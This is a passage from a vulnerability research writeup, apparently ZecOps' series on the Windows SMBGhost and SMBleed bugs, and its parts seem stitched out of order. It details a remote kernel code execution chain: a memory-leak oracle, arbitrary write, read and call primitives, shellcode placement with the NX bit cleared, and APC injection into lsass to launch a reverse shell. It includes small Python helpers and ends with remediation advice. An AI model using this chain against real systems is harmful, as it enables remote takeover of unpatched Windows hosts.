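        0xFFFF8A0022221250, 0xFFFF8A0022221150,
        0, 0, 0, 0, 0, b"\0" * 12,
    )
    hdr = parse_srvnet_buffer_hdr(sample)
    print(hex(hdr.Flink), hex(hdr.PoolAllocationPtr))
```

With a single buffer in the list, `Flink` and `Blink` carry the same value, which is the address of the list head inside the connection object.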
Getting a module base address
Now that we know how to get the two pointers – a pointer to a pool-allocated memory block and a pointer to an SRVNET_RECV struct – we can freely modify the two buffers using the write-what-where primitive. There are probably several ways from this point to achieve RCE, but we had a feeling that getting a base address of a module would be the most straightforward option since there are so many things we can modify in a data section of a module. As we’ve seen, none of the pointers in a memory block allocated by SrvNetAllocateBuffer point to a module. We had hopes for the SRVNET_RECV struct, but we didn’t find pointers that point to a module there either. On the bright side, there are several pointers to modules one additional dereference away:
At this point, we noticed that since we can override those pointers in SRVNET_RECV, we can call an arbitrary function by replacing the HandlerFunctions pointer and triggering one of the events, e.g. closing the connection so that Srv2DisconnectHandler is called. This will come in handy later, but we didn’t have any function pointers to call yet, so we continued with our attempt to get a module base address.
Unlike writing, reading those pointers is not as easy since our technique allows us to read only from the “User buffer” region. So close, yet so far. Since we can get and modify a pool-allocated memory block and an SRVNET_RECV struct, we hoped to find code that we can trigger that does a double-dereference-read followed by a double-dereference-write with two variables that we control, similar to the following:
ptr1 = *(pSrvNetRecv + offset1)
value = *ptr1
ptr2 = *(pSrvNetRecv + offset2)
*ptr2 = value
If we could find such a snippet, we would trigger it to copy the first pointer (e.g. HandlerFunctions) to the “User buffer” region, read it, then copy the second pointer (e.g. the Srv2ConnectHandler function pointer) to the “User buffer” region and read it as well, deducing the module base address from it. We searched for such a snippet for a long time, but didn’t find a good match. Finally, we settled for a sub-optimal option which nevertheless worked. Let’s take a look at the relevant part of the SrvNetFreeBuffer function (simplified):
Upon freeing the buffer, if buffer flags 0x02 (means the buffer is part of a lookaside list) and 0x01 (means the buffer has no transport header) are set, some operations are made on the two MDL objects to add the transport header before resetting the flags to zero and returning the buffer back to the lookaside list. If we set aside the meaning behind the operations on the MDL objects for a moment and look at the operations in terms of memory manipulation, we can notice that the code does a double-dereference-read followed by a double-dereference-write with two variables that we control (the two MDL pointers), which is what we were looking for. The downside is that the content that we want to read from is also modified (lines 13-16, 29), a side effect we hoped to avoid.
Given the above, here’s how we managed to read the AcceptSocket pointer:
1. Prepare buffer A from a lookaside list such that the “User buffer” region is filled with zeros. This buffer will end up holding the pointer that we’ll eventually read.
2. Prepare buffer B from a different lookaside list such that:
The pMdl1 pointer points at the address of the HandlerFunctions pointer minus 0x18, the offset of MappedSystemVa in the MDL struct.
The pMdl2 pointer points at the “User buffer” region of Buffer A.
The BufferFlags field is set to 0x03.
We can override the SRVNET_BUFFER_HDR struct fields by decompressing them from a larger buffer using the technique described in the Observation #2 section of the previous part of the writeup.
3. When buffer B is freed, the following operations will take place:
The MDL flags will be read from the second MDL at buffer A. If the MDL_PARTIAL_HAS_BEEN_MAPPED flag is set, MmUnmapLockedPages will be called and the system will likely crash. That’s why we filled the buffer with zeros in step 1.
The HandlerFunctions pointer and the memory around it will be modified as depicted here:
The HandlerFunctions pointer and the memory around it will be read as depicted here:
+00 | __ __ __ __ __ __ __ __
+08 | __ __ __ __ __ __ __ __
+10 | __ __ __ __ __ __ __ __
+18 | ab cd ef gh ij kl mn op <-- HandlerFunctions
+20 | __ __ __ __ __ __ __ __
+28 | qr st uv wx __ __ __ __
The “User buffer” region of buffer A will be modified as depicted here: (The orange-colored bytes contain the pointer we want to read. We just need to order them properly.)
4. Read the AcceptSocket pointer from the “User buffer” region of buffer A.
The good news: we managed to read the pointer. The bad news: we corrupted some data in the SRVNET_RECV struct. Luckily for us, the corruption doesn’t affect the system as long as nothing happens with the relevant connection. When something does happen, e.g. the connection closes, the system crashes. That’s not a problem since we’ll get RCE soon, and we can fix the corruption if we want to. We didn’t implement such a fix in our POC; it is left as an exercise for the reader.
After reading the AcceptSocket pointer, we used the same technique to read the srvnet!SrvNetWskConnDispatch pointer. We read the AcceptSocket pointer and not the HandlerFunctions pointer since the array of handler functions is shared between all connections, while the buffer pointed to by AcceptSocket is not shared with other connections. Therefore, we can corrupt the latter, affecting the stability of only a single connection.
If we have a copy of the srvnet.sys file used on the target computer, we can just compute the offset of the SrvNetWskConnDispatch pointer in the module locally and subtract the offset from the pointer we read, getting the srvnet.sys module base address as a result. That’s what we did in our POC to keep things simple. One can improve it to be more general. One option that comes to mind is keeping several versions of srvnet.sys locally, and deducing the correct one by the least significant bytes of the read pointer.
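The base address computation and the "several versions" idea can be sketched in a few lines of Python. This is only an illustration: the build names and RVA values below are invented, and the matching relies on the fact that a module is loaded at a page-aligned address, so the low 12 bits of the leaked pointer equal the low 12 bits of the symbol's offset within the file.

```python
PAGE_MASK = 0xFFF  # module base addresses are page-aligned


def candidate_builds(leaked_ptr, known_rvas):
    """Return the builds whose SrvNetWskConnDispatch RVA matches the page offset of the leak."""
    return [name for name, rva in known_rvas.items()
            if (leaked_ptr & PAGE_MASK) == (rva & PAGE_MASK)]


def module_base(leaked_ptr, rva):
    """Subtract the symbol's RVA from the leaked pointer to get the module base."""
    base = leaked_ptr - rva
    if base & PAGE_MASK:
        raise ValueError("RVA does not fit the leaked pointer: base is not page-aligned")
    return base


if __name__ == "__main__":
    # Hypothetical RVAs of SrvNetWskConnDispatch in two locally stored srvnet.sys builds.
    known_rvas = {"build_a": 0x2D170, "build_b": 0x2E2A8}
    leaked = 0xFFFFF80312340000 + 0x2D170  # made-up leaked pointer

    for name in candidate_builds(leaked, known_rvas):
        print(name, hex(module_base(leaked, known_rvas[name])))
```

If two stored builds happen to share the same low 12 bits, the page offset alone cannot tell them apart and an additional check would be needed.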
Implementing arbitrary read
From the beginning of this research we had a convenient write-what-where (arbitrary write) primitive, but had nothing that allowed us to read memory. We worked hard until now to gain some memory reading abilities, and at this point we felt that we had enough tools to make our life easier and implement a convenient arbitrary read primitive. We began by exploring the possibilities of calling an arbitrary function.
Given that we have the base address of the srvnet.sys module, we can call any of the module’s functions. But what about the function’s arguments? The srv2!Srv2ReceiveHandler function is called by SrvNetCommonReceiveHandler, and the call looks like this:
The first two arguments are read from the SRVNET_RECV struct, so we can control them. We don’t have as much control over the other arguments. The x86-64 calling convention specifies that it’s the caller’s responsibility to allocate and free the stack space for the arguments, so even though an 8-argument function is intended to be called, we can replace the pointer with a function that expects any other number of arguments, and it will work.
Here are the steps we used to trigger the function call:
1. Send a specially crafted message so that the connection’s SRVNET_RECV struct pointer will be copied to a buffer we can read.
2. Send another, valid message, which will reuse the same SRVNET_RECV struct, but don’t close the connection yet. Note that when a connection is closed, the SRVNET_RECV struct is not freed. The SrvNetPrepareConnectionForReuse function is called to reset the struct so that it can be reused for the next connection.
3. Read the SRVNET_RECV struct pointer that we copied in step 1.
4. Replace the HandlerFunctions pointer and the arguments using the write-what-where primitive.
5. Send an additional message over the connection from step 2 so that the function that took the place of srv2!Srv2ReceiveHandler is called.
Now all we had to do was to find a convenient function to copy memory from one location to another, so that we can copy arbitrary memory to the pool buffer we can read from. memcpy comes to mind, and srvnet.sys does have such a function (memmove, to be precise), but this function requires a third argument, the number of bytes to be copied, which we don’t control. Failing to find a convenient function that requires one or two arguments, we realized that we’re not limited to functions implemented in srvnet.sys: we can also call functions from srvnet’s import table by pointing HandlerFunctions at the right offset. There, we found the perfect function: RtlCopyUnicodeString.
The RtlCopyUnicodeString function gets two UNICODE_STRING pointers as arguments, and copies the content of the source string to the destination string. Unlike C strings which are NULL-terminated, strings in the kernel are defined by the UNICODE_STRING struct which holds a pointer to the string, and the string’s length in bytes. The string buffer can hold any binary data. If you peek at the implementation of RtlCopyUnicodeString, you can see that the copying is done with the memmove function, i.e. plain binary data copying. All we have to do is prepare our two UNICODE_STRING structs and call RtlCopyUnicodeString, then read the copied data:
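To make the preparation step more concrete, here is a minimal Python sketch of how the two UNICODE_STRING structs could be serialized before being written with the write-what-where primitive. The 64-bit layout (two 16-bit lengths, four bytes of padding, an 8-byte buffer pointer) is the documented one; the helper name and the addresses are hypothetical. Note that Length is a 16-bit field, so a single call can copy at most 0xFFFF bytes.

```python
import struct


def pack_unicode_string(buffer_addr, length, maximum_length=None):
    """Serialize a 64-bit UNICODE_STRING: Length, MaximumLength, padding, Buffer."""
    if maximum_length is None:
        maximum_length = length
    if not 0 <= length <= maximum_length <= 0xFFFF:
        raise ValueError("lengths must satisfy 0 <= Length <= MaximumLength <= 0xFFFF")
    return struct.pack("<HH4xQ", length, maximum_length, buffer_addr)


if __name__ == "__main__":
    # Made-up addresses for illustration only.
    address_to_read = 0xFFFFF80312345000     # kernel memory we want to leak
    readable_pool_buffer = 0xFFFF8A0022220050  # "User buffer" region we can read back
    size = 0x100

    source = pack_unicode_string(address_to_read, size)
    # The destination Length is overwritten by the copy; MaximumLength bounds it.
    destination = pack_unicode_string(readable_pool_buffer, 0, size)
    print(source.hex(), destination.hex())
```

RtlCopyUnicodeString takes the destination string as its first argument and the source string as its second, so `destination` would be the first controlled argument and `source` the second.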
Executing shellcode
After achieving a convenient arbitrary read primitive, we moved on to the next challenge towards our goal of remote code execution: running a shellcode. We used the technique that Morten Schenk presented in his Black Hat USA 2017 talk (pages 47-51).
The idea is to write a shellcode below the KUSER_SHARED_DATA structure which is located at a constant address, the only address that is not randomized in the kernel memory layout of the recent Windows versions. Then modify the relevant page table entry, making the page executable. The base address of the page table entries in the kernel is randomized, but can be retrieved from the MiGetPteAddress function in ntoskrnl.exe. Here are the steps we used to execute our shellcode:
Use our arbitrary read primitive to get the base address of ntoskrnl.exe from srvnet’s import table.
Read the base address of the page table entries from the MiGetPteAddress function, as described in Morten’s slides.
Write the shellcode at address KUSER_SHARED_DATA + 0x800 (0xFFFFF78000000800). Note that we could also use one of the pool buffers; using KUSER_SHARED_DATA is just more convenient.
Calculate the relevant page table entry address and clear the NX bit to allow execution, as described in Morten’s slides.
Call the shellcode using our ability to call an arbitrary function.
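The page table entry arithmetic from the steps above can be sketched as follows. The formula is the one MiGetPteAddress applies on x64 (shift the virtual address right by 9, mask, add the PTE base), and the NX flag is bit 63 of the entry. The function names are ours, and the PTE base used in the example is the old, pre-randomization constant, chosen only so the numbers can be checked by hand; on a real target the base has to be read from MiGetPteAddress.

```python
KUSER_SHARED_DATA = 0xFFFFF78000000000
SHELLCODE_ADDRESS = KUSER_SHARED_DATA + 0x800
NX_BIT = 1 << 63
MASK_64 = 0xFFFFFFFFFFFFFFFF


def pte_address(virtual_address, pte_base):
    """Address of the page table entry that maps `virtual_address`."""
    return ((virtual_address >> 9) & 0x7FFFFFFFF8) + pte_base


def clear_nx(pte_value):
    """Return the PTE value with the no-execute bit cleared."""
    return pte_value & ~NX_BIT & MASK_64


if __name__ == "__main__":
    # Illustration only: the historic, non-randomized PTE base.
    legacy_pte_base = 0xFFFFF68000000000
    print(hex(pte_address(SHELLCODE_ADDRESS, legacy_pte_base)))
```

In the exploit flow, the entry at the computed address would be read with the arbitrary read primitive, passed through something like `clear_nx`, and written back with the write-what-where primitive.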
Launching a reverse shell
Technically, we achieved remote code execution, so we could stop here. But if we’re not popping calc or launching a reverse shell, the POC is not complete, so we went on to fill that gap. Since our shellcode runs in kernel mode, we can’t just run cmd.exe or calc.exe and call it a day. We needed to find a way to get our code to run in user mode. While searching for prior work on the topic we found sleepya’s shellcode, written originally for EternalBlue exploits, which is designed to do just that.
In short, here’s what the shellcode does:
Hook IA32_LSTAR MSR to lower the IRQL (Interrupt Request Level) from DISPATCH_LEVEL to PASSIVE_LEVEL. The shellcode begins execution at the DISPATCH_LEVEL IRQL which imposes several limitations. For more information see the great explanation of zerosum0x0.
Find a privileged user mode process (lsass.exe or spoolsv.exe) and queue a user mode APC in one of the alertable threads that is in waiting state.
In the APC kernel routine, allocate EXECUTE_READWRITE memory and point the APC normal (user mode) routine there. Then copy the user mode shellcode to the newly allocated memory, prepended with a stub to create a new thread.
In the APC normal routine a new thread is created, executing the user mode shellcode.
Published about three years ago, the shellcode didn’t work right away on recent Windows versions, so we had to make a couple of adjustments:
Incompatibility with the KVA Shadow mitigation. In the blog post Fixing Remote Windows Kernel Payloads to Bypass Meltdown KVA Shadow zerosum0x0 explains why the first part of the shellcode, IA32_LSTAR MSR hooking, isn’t supported when the KVA Shadow mitigation is enabled, and proposes a fix. We tried the proposed fix, but it didn’t work on newer Windows versions – zerosum0x0 targeted Windows 10 version 1809 while we were targeting versions 1903 and 1909. The right thing to do is to improve the fix or find another solution, but we just removed the IRQL lowering part. As a result, the POC can sometimes crash the system while trying to access paged memory (bug check IRQL_NOT_LESS_OR_EQUAL), but it doesn’t happen often, so we left it as is since it’s good enough for a POC.
Fixed finding the base address of ntoskrnl.exe. At first, we tried using zerosum0x0’s method – get an address of the first ISR (Interrupt Service Routine), which is located in ntoskrnl.exe, and search for a nearby PE header. The method didn’t work for us since the ISR pointer points to ntoskrnl’s INITKDBG section which is not mapped. Since we already found the ntoskrnl.exe base address, we fixed it by just passing it as an argument to the shellcode.
Fixed a problem with finding the offset of ETHREAD.ThreadListEntry. The original code looked for the current thread in the thread list of the current process. The thread won’t be found if the current thread is attached to a different process than the one it was originally created in (see KeStackAttachProcess).
Fixed the UserApcPending check in the KAPC_STATE struct for Windows 10 version RS5 (1809) and newer. Since RS5, UserApcPending shares a byte with the newly added bit value, SpecialUserApcPending.
With the above fixed, we finally managed to make the shellcode work. We just needed to fill in the user mode part of the code to run. We used MSFvenom, the Metasploit payload generator, to generate a user mode shellcode to spawn a reverse shell.
Targets with more than one logical processor
In the Observation #1 section of the previous part of the writeup we assumed that our target has only one logical processor. With this assumption, we could rely on the lookaside lists buffer reusing, knowing that we get the same buffer every time as long as the allocation size is the same. As a reminder, the lookaside lists are created upon initialization, a list for each size and logical processor, as depicted in the following table:
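| Logical processor ↓ / Allocation size → | 0x1100 | 0x2100 | 0x4100 | 0x8100 | 0x10100 | 0x20100 | 0x40100 | 0x80100 | 0x100100 |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Processor 1 | x | x | x | x | x | x | x | x | x |
| Processor 2 | x | x | x | x | x | x | x | x | x |
| … | … | … | … | … | … | … | … | … | … |
| Processor n | x | x | x | x | x | x | x | x | x |
Each cell marked with “x” is a separate lookaside list.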
With more than one logical processor, things are a bit more complicated – we get the same buffer only as long as the allocation is made on the same logical processor. Our first attempt at overcoming this limitation was redundancy. When writing to one of the lookaside list buffers, write multiple times. When reading from one of the lookaside list buffers, read multiple times and choose the most common value. This approach would work if the logical processor usage was distributed evenly, but we found that it’s not the case. We tested our POC in VirtualBox, and from our observations, some logical processors are preferred over others. For a setup of 4 logical cores, here’s the distribution of handling the incoming packet in a test execution:
| Logical processor | Incoming packets handled |
| --- | --- |
| Logical processor 1 | 0.2% |
| Logical processor 2 | 0.8% |
| Logical processor 3 | 7.9% |
| Logical processor 4 | 91.1% |
Here’s the distribution of handling the decompression:
| Logical processor | Decompressions executed |
| --- | --- |
| Logical processor 1 | 13.3% |
| Logical processor 2 | 5.1% |
| Logical processor 3 | 6.8% |
| Logical processor 4 | 74.8% |
As you can see, in this specific case logical processor 4 did most of the work. Logical processor 1 handled only 1 out of every 500 incoming packets!
We tweaked the POC such that it sends several packets simultaneously from multiple threads to improve the logical processor usage distribution. We also added error detection, so that if the data that is read doesn’t make sense, another reading attempt is made instead of proceeding and most likely crashing the system. The changes we made were enough to make the POC work with VirtualBox targets with multiple logical processors, but from a quick test the POC doesn’t work with VMware targets or (at least some) physical computers with multiple logical processors. We didn’t try to improve the POC further to support all targets, which we believe can be achieved with a better strategy for ordering the reads and writes.
If you’d like to study the code, we suggest starting with the initial, less noisy version which was designed for a single logical processor. It can be found in a previous commit here.
ZecOps Detection
ZecOps classifies forensic logs related to this issue as #SMBGhost and #SMBleed. You can find more information on how to use ZecOps solutions for Endpoints & Servers, Mobile devices, or applications. Besides SMBleed / SMBGhost, ZecOps Crash Forensics solutions can find other, previously unknown vulnerabilities that are exploited in the wild. If you care about persistent threats – we’ll be happy to assist.
Remediation
You can remediate the impact of both issues by doing one of the following:
Apply the latest security updates (recommended)
Block port 445 / enforce host-isolation
Disable SMBv3.1.1 compression
Summary
This is the third and final part of the writeup, in which we used the findings from the previous parts to achieve RCE using SMBGhost and SMBleed. We hope you enjoyed the read. Here’s a recap of the milestones during our research on the SMB bugs:
A write-what-where primitive, demonstrated in our previous research about achieving local privilege escalation.
In our previous blog post, we demonstrated how the SMBGhost bug (CVE-2020-0796) can be exploited for local privilege escalation. A brief reminder: CVE-2020-0796, also known as “SMBGhost”, is a bug in the compression mechanism of SMBv3.1.1. The bug affects Windows 10 versions 1903 and 1909, and it was announced and patched by Microsoft about 3 months ago. In the previous blog post we mentioned that although the Microsoft Security Advisory describes the bug as a Remote Code Execution (RCE) vulnerability, there is no public POC that demonstrates RCE through this bug. This was true until chompie1337 released the first public RCE POC, based on the writeup of Ricerca Security. Our POC uses a different method, and doesn’t involve physical memory access. Instead, we use the SMBleed (CVE-2020-1206) bug to help with the exploitation.
Our previous research led to the local privilege escalation attack that we have shown in our previous writeup. SMBGhost can be used for an RCE attack and we aim to demonstrate how we achieved it in this series of blog posts. As we showed in the previous writeup, we were able to implement a remote write-what-where primitive. However, for an RCE capability we need to know where to write the arbitrary data. Since most of the memory layout in the modern Windows versions is randomized, having the ability to write arbitrary data in any location is still very limiting. While searching for another capability to assist with the attack, we discovered a new bug in Microsoft’s SMB implementation. For technical details and a POC, check out our recent publication. We named it SMBleed since it allows leaking parts of memory remotely, similar to Heartbleed, just via SMB. While the concept is similar and an authenticated user can read large blocks of uninitialized data, the attack surface without authentication is more limited. Since we aimed for an unauthenticated RCE exploit, the first thing we looked for was a way to read memory unauthenticated.
Diving into SMB
Note: The following sections describe in detail a technique we were able to use for exploitation, but dumped in favor of a different approach which worked better in our case. Still, it’s an approach that we felt is worth sharing. If you prefer to stick to what ended up in our final POC, you can just read Observation #1 and Observation #2, and then skip to the A different approach – decompression section.
The SMBleed bug allows an attacker to send a message such that its beginning is controlled by the attacker, while the rest of the message contains uninitialized data which is treated as a part of the message. For an authenticated user, there’s an easy way to exploit this using the SMB2 WRITE message to write uninitialized data to a file, and then read it with the SMB2 READ command. We started by looking for a similar technique for an unauthenticated user – a way to send a message such that a part of it can be retrieved later.
After skimming over the protocol specification and debugging a couple of sessions, we saw that a regular flow begins with the following commands that are sent by the client:
If incorrect credentials are used, the session is aborted after the second SMB2 SESSION_SETUP request.
We assume that we don’t have valid credentials, so we checked whether other commands can be sent without authentication. We found the following after some experimentation:
The first command to be sent must be SMB2 NEGOTIATE. It also must be the only SMB2 NEGOTIATE command during the session.
Since the SMB2 NEGOTIATE message is not compressed (the compression algorithm, if any, is decided during the negotiation), all that’s left is SMB2 SESSION_SETUP. So we took a closer look at the format of the SMB2 SESSION_SETUP message, hoping to find a way to get some of the data that is being sent back.
A closer look at SMB2 SESSION_SETUP
As we’ve already mentioned, a regular session that we observed sends two SMB2 SESSION_SETUP commands. At first, we checked whether one of the replies to these messages sends back some of the data. If that was the case, we could try to craft a message such that the data is left uninitialized. Unfortunately, we didn’t find such data. We couldn’t find a way to affect the first response, and the second response had an empty body and the 0xC000006D (STATUS_LOGON_FAILURE) status in the packet header (remember, we assume we don’t have valid credentials). The first SMB2 SESSION_SETUP request contains an NTLM Negotiate message, and the second SMB2 SESSION_SETUP request contains an NTLM Authenticate message. The former is rather simple, and we weren’t able to use it for something interesting, so we focused on the latter.
The NTLM Authenticate message
After studying the NTLM Authenticate message we came to the conclusion that the message’s most complex part, which is the best fit for misuse, is the NTLM2 V2 Response structure. It’s a variable-length byte array, mostly consisting of the NTLMv2_CLIENT_CHALLENGE structure. We noticed that if the structure doesn’t pass some of the initial checks, the 0xC000000D (STATUS_INVALID_PARAMETER) status is returned instead of 0xC000006D (STATUS_LOGON_FAILURE). Some of these checks verify the AvPairs field.
The AvPairs field is a variable-length byte array that contains a sequence of AV_PAIR structures. Each AV_PAIR structure defines an attribute/value pair. The attribute is defined by the AvId field, the AvLen field defines the value’s length in bytes, and the Value field is a variable-length byte-array that contains the value itself. An item with the attribute MsvAvEOL and a zero length marks the end of the array.
The authentication message is handled by the SsprHandleAuthenticateMessage function in the msv1_0.dll module. Among the initial checks, the function makes sure that the AvPairs array contains the following attributes: 0x0001 (MsvAvNbComputerName), 0x0002 (MsvAvNbDomainName). The value is not checked. The check itself is done by traversing the array and checking whether the requested attribute exists, and whether its length is within the struct. If the length is too large, the traversal is stopped. So practically, the MsvAvEOL item is not required for the NTLM Authenticate message to be valid.
At this point we figured that we can craft a request that can provide an answer to the following question: Given two bytes at offset x, interpreted as uint16, is the value larger than y? x and y are controlled by us. Consider the following packet:
The content of value 0x0001 (MsvAvNbComputerName) doesn’t matter, so we can use it to adjust the offset of the second value. For the second value, we only set the attribute as 0x0002 (MsvAvNbDomainName), leaving the length and the value uninitialized. We also set the size of the whole packet so that there are y bytes that follow the length field. There are two possible outcomes depending on the uninitialized value of the length field of the second value:
length <= y: In this case the check passes, since a valid 0x0002 (MsvAvNbDomainName) value is found. The server returns 0xC000006D (STATUS_LOGON_FAILURE) since the credentials are incorrect.
length > y: In this case the check fails, since the second value has an invalid length and is discarded. The server returns 0xC000000D (STATUS_INVALID_PARAMETER) for this case.
According to the server response we can deduce the answer to our question.
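The traversal check and the two outcomes can be modelled in Python as follows. This is a sketch of the behaviour as described above, not a reimplementation of the code in msv1_0.dll: the function names are ours, and the uninitialized length field is passed in as a parameter so that both outcomes can be exercised.

```python
import struct

MSV_AV_EOL = 0x0000
MSV_AV_NB_COMPUTER_NAME = 0x0001
MSV_AV_NB_DOMAIN_NAME = 0x0002

STATUS_LOGON_FAILURE = 0xC000006D
STATUS_INVALID_PARAMETER = 0xC000000D


def has_av_pair(av_pairs, wanted_id):
    """Walk the AV_PAIR array; stop as soon as a length runs past the buffer."""
    pos = 0
    while pos + 4 <= len(av_pairs):
        av_id, av_len = struct.unpack_from("<HH", av_pairs, pos)
        if pos + 4 + av_len > len(av_pairs):
            return False  # invalid length: the traversal is stopped
        if av_id == wanted_id:
            return True
        if av_id == MSV_AV_EOL:
            return False
        pos += 4 + av_len
    return False


def modelled_status(av_pairs):
    """Status an unauthenticated client would see, per the description above."""
    required = (MSV_AV_NB_COMPUTER_NAME, MSV_AV_NB_DOMAIN_NAME)
    if all(has_av_pair(av_pairs, av_id) for av_id in required):
        return STATUS_LOGON_FAILURE       # checks pass, credentials are wrong
    return STATUS_INVALID_PARAMETER       # a required attribute was not found


def craft_av_pairs(uninitialized_length, y, padding=4):
    """First pair adjusts the offset; second pair's length stands in for leaked data."""
    first = struct.pack("<HH", MSV_AV_NB_COMPUTER_NAME, padding) + b"A" * padding
    second = struct.pack("<HH", MSV_AV_NB_DOMAIN_NAME, uninitialized_length)
    return first + second + bytes(y)


if __name__ == "__main__":
    for leaked in (0x10, 0x30):
        print(hex(leaked), hex(modelled_status(craft_av_pairs(leaked, y=0x20))))
```

Changing `padding` moves the second pair, which corresponds to choosing the offset x, and the number of trailing bytes corresponds to y.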
So, now we can get this small piece of information, right? Not so fast. Unfortunately, the NTLM Authenticate message is limited to 0xB48 bytes, and is discarded if it’s larger than that. The check is done by the SspContextGetMessage function in the msv1_0.dll module. Can we solve this problem by leaving only one of the two length bytes uninitialized? Unfortunately not, since the uint16 value is encoded as little endian, and to the best of our knowledge at this point, we can only leave the second, more significant byte uninitialized, which doesn’t help too much. Unable to achieve something better within a single SMB session, we looked at what else can be done.
Observation #1: Lookaside lists
As we already mentioned in our previous research, the modules that handle SMB in the kernel (srv2.sys and srvnet.sys) use a custom allocation function, SrvNetAllocateBuffer, exported by srvnet.sys. This function uses lookaside lists for small allocations as an optimization. Lookaside lists are used for effectively reserving a set of reusable, fixed-size buffers for the driver.
The lookaside lists are created upon initialization, a list for each size and logical processor, as depicted in the following table:
| Logical processor ↓ / Allocation size → | 0x1100 | 0x2100 | 0x4100 | 0x8100 | 0x10100 | 0x20100 | 0x40100 | 0x80100 | 0x100100 |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Processor 1 | x | x | x | x | x | x | x | x | x |
| Processor 2 | x | x | x | x | x | x | x | x | x |
| … | … | … | … | … | … | … | … | … | … |
| Processor n | x | x | x | x | x | x | x | x | x |
Each cell marked with “x” is a separate lookaside list. To simplify our analysis, we’ll assume our target has only one logical processor (we’ll cover targets with more than one logical processor in the third part of the writeup). In this case, as long as the same amount of bytes is allocated, the same lookaside list is used, and the same allocated buffer is reused again and again. We can use this implementation detail to have some control over the uninitialized data, as we’ll see soon.
Observation #2: Failing the decompression
Let’s revisit what happens when a compressed packet is decompressed (refer to our previous research for more details and pseudocode):
In case CompressedData is invalid, the decompression stage fails, the copy stage is not executed, and the connection is dropped. But the decompression might fail only after extracting a part of CompressedData which is valid. This allows us to craft a request such that data of our choice will be written at an offset of our choice, like this:
Back to the NTLM Authenticate message
We can use the above observations to make our technique work by using two steps:
Send a message with invalid compressed data such that only a single zero byte is extracted. That byte will be the most significant byte of the length of the second value in the AvPairs array.
Send a message just as before, but make sure that the same lookaside list is used for the allocation, so that the zero byte will be there.
This time, this technique can answer the following question: Given a byte at offset x, is the value larger than y? As before, x and y are controlled by us.
Since we can re-use the buffer again and again by making sure the same lookaside list is used, we can repeat the steps several times while changing y, and finally deduce the byte value at a given offset.
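One way to pick the successive values of y is a binary search, which needs at most eight questions per byte. The sketch below assumes a hypothetical callable `is_greater_than(y)` that performs the two steps above against the target and reports whether the hidden byte is larger than y; here it is replaced by a local stand-in. Binary search is our choice for the illustration; any strategy for varying y would do.

```python
def recover_byte(is_greater_than):
    """Recover a byte value using only "is the value larger than y?" answers."""
    low, high = 0, 255
    while low < high:
        middle = (low + high) // 2
        if is_greater_than(middle):
            low = middle + 1   # the byte is in (middle, high]
        else:
            high = middle      # the byte is in [low, middle]
    return low


if __name__ == "__main__":
    secret = 0xA7  # stand-in for an uninitialized byte on the target
    queries = []

    def oracle(y):
        queries.append(y)
        return secret > y

    print(hex(recover_byte(oracle)), "recovered in", len(queries), "queries")
```

Since each question costs at least two requests (one to plant the zero byte, one to probe), keeping the number of questions low also keeps the amount of traffic low.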
Unfortunately, this technique has a limitation – the offset of the byte we can read is limited to 0xADB bytes from the beginning of the packet buffer. That’s because the offset of the NTLM Authenticate message (AUTHENTICATE_MESSAGE) is limited to 0x40 bytes after the end of the SMB2 SESSION_SETUP headers (enforced by the Smb2ValidateSessionSetup function in srv2.sys), and the size of the NTLM Authenticate message (AUTHENTICATE_MESSAGE) is limited to 0xB48 bytes, as we already mentioned.
Overcoming the offset limitation
Let’s say that we want to read a byte at offset 0x1100 (we’ll see why we want to go that far in the third part of the writeup). We can’t do it directly with our technique, but we found the following solution: since the buffers get reused from the lookaside lists, we can “lift up” the target byte via the decompression function by setting the Offset field to point beyond that byte. We just need to make sure that the data that is located there can be interpreted as valid compressed data, otherwise the copying won’t happen.
The incoming packet buffer contains extra 16 header bytes which aren’t copied over when the decompression takes place. As a result, the copied data, including the target byte, is copied to a location 16 bytes closer to the beginning of the allocated buffer. We can repeat that several times, until the target byte offset is low enough.
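As a back-of-the-envelope check, the number of repetitions can be estimated with a couple of lines of Python. This sketch assumes that every pass moves the target byte exactly 16 bytes closer to the start of the buffer and that any offset up to and including 0xADB is readable; both are simplifications of the description above, and the function name is ours.

```python
def lifts_needed(target_offset, max_readable_offset=0xADB, step=16):
    """How many 16-byte "lifts" bring target_offset within the readable range."""
    if target_offset <= max_readable_offset:
        return 0
    distance = target_offset - max_readable_offset
    return -(-distance // step)  # ceiling division


if __name__ == "__main__":
    count = lifts_needed(0x1100)
    print(count, hex(0x1100 - count * 16))
```

Under these assumptions, a byte at offset 0x1100 needs 99 passes and ends up at offset 0xAD0.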
Address leak POC
You can find a script that demonstrates the above technique here. Remember that we assumed that the target computer has only one logical processor, so you’ll have to configure your VM properly to get the script working. If all goes well, the script will read and print an address from the NonPagedPoolNx pool. In fact, that would be the address of one of the buffers residing in one of the lookaside lists.
A different approach – decompression
While advancing with our research, we realized that the decompressed SMB packet is not the only complex structure that can be invalid in various ways. Even before handling all of the SMB-related structures, the compressed buffer can be invalid as well. If the decompression fails, the connection is dropped, which can be detected.
Microsoft’s SMB implementation offers three compression algorithms to choose from: LZNT1, Plain LZ77 and LZ77+Huffman. We looked at LZNT1 since it’s the first in the list, and it’s rather simple – about 80 Python lines for a decompression function. Without diving too much into details, the compressed data consists of a sequence of compressed blocks, each beginning with a uint16 variable marking its length. When a length of zero is encountered, the decompression completes (similar to a NULL-terminated string, but it’s optional). Also, conveniently, a range of zero bytes represents valid compressed data. With the above, we managed to answer the same question as we did with the previous approach: Given a byte at offset x, is the value larger than y? Here, too, x and y are controlled by us.
We accomplished that by sending a valid packet which is followed by a range of bytes similar to the following (note that it’s a simplification, the actual byte values are a bit different):
There are two possible outcomes depending on the uninitialized value of the least significant byte of the length field:
length <= y: In this case the whole compressed block will consist of zero bytes, which is completely valid, and the next block’s length will be zero, completing the decompression successfully. The server will return a response.
length > y: In this case, either the first or the second compression block will contain 0xFF bytes, which will fail the decompression. The server will drop the connection.
Just like with the previous technique, we can use observations #1 and #2 to craft a message with an uninitialized byte in the middle of the message by using two steps:
Send a message with invalid compressed data such that only the part we need is extracted. The bytes that will be extracted are the bytes in the image above.
Send a second message, but make sure that the same lookaside list is used for the allocation, so that the bytes from step 1 will be there.
